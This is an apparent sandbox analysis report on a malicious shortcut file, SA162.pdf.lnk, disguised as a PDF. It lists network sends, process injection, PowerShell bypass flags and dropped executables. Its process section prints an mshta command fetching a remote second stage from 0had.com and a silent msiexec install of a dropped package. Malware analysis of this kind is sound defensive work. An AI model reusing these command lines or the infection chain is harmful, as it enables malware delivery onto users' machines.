send April 19, 2024, 1:16 p.m.	buffer: kgf!ð)7òÛÑ§°(~ÓtÙ(¼ æZK,?/5 ÀÀÀ À 28&ÿ 0had.com socket: 1308 sent: 112	1	112
send April 19, 2024, 1:16 p.m.	buffer: kgf!ð*f,ÂÓº&øù8¾nOØÜþÐ<DßÀ#j@/5 ÀÀÀ À 28&ÿ 0had.com socket: 1308 sent: 112	1	112
send April 19, 2024, 1:16 p.m.	buffer: kgf!ð*øéÆâOîØ!Wög¯aéûKÆ§¶ðªõªÄ/5 ÀÀÀ À 28&ÿ 0had.com socket: 1308 sent: 112	1	112
send April 19, 2024, 1:16 p.m.	buffer: kgf!ð+ZL66ÅÓ³¨ÅºiËÛ 1)mâ/5 ÀÀÀ À 28&ÿ 0had.com socket: 1308 sent: 112	1	112

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	"C:\Windows\system32\mshta.exe" http://0had.com/stage2
parent_process	powershell.exe				martian_process	"C:\Windows\system32\msiexec.exe" /qn /i C:\Users\test22\AppData\Roaming\putty.msi

Putty Files, Registry Keys and/or Mutexes Detected

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2144 resumed a thread in remote process 1368
NtResumeThread April 19, 2024, 1:16 p.m.	thread_handle: 0x00000330 suspend_count: 1 process_identifier: 1368	1	0	0

Creates a suspicious Powershell process (4 events)

option	-ep unrestricted	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-ep unrestricted	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile

The process powershell.exe wrote an executable file to disk (22 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\mshta.exe
file	C:\Windows\System32\msiexec.exe

SA162.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All